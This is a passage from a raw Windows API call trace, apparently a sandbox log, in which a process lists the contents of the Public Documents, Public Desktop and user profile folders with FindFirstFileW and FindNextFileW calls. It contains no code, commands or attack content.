lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x0) returned 0x1a [0250.139] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.139] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.139] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.139] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0250.139] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0250.140] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0250.140] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0250.140] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\desktop.ini", lpFilePart=0x0) returned 0x25 [0250.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x0) returned 0x23 [0250.140] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos\\", lpFilePart=0x0) returned 0x24 [0250.140] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.146] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.147] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x0) returned 0x25 [0250.147] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures\\", lpFilePart=0x0) returned 0x26 [0250.147] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.148] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x0) returned 0x22 [0250.148] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music\\", lpFilePart=0x0) returned 0x23 [0250.148] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0250.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0250.150] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0250.150] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.150] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.150] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0250.150] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.151] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0250.151] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0250.151] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0250.151] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.151] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop", lpFilePart=0x0) returned 0x17 [0250.151] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\", lpFilePart=0x0) returned 0x18 [0250.151] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Desktop\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83c279c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x83c279c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x83c4db20, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x7e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe Reader X.lnk", cAlternateFileName="ADOBER~1.LNK")) returned 1 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2826d6cd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2826d6cd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28860dd8, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7df21ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7df21ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7df21ca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x8d1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google Chrome.lnk", cAlternateFileName="GOOGLE~1.LNK")) returned 1 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0250.152] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.153] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0250.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x2a [0250.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x2a [0250.153] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Desktop\\Adobe Reader X.lnk", lpFilePart=0x0) returned 0x2a [0250.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0250.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2fc) returned 1 [0250.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0250.156] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0250.157] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0250.158] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, 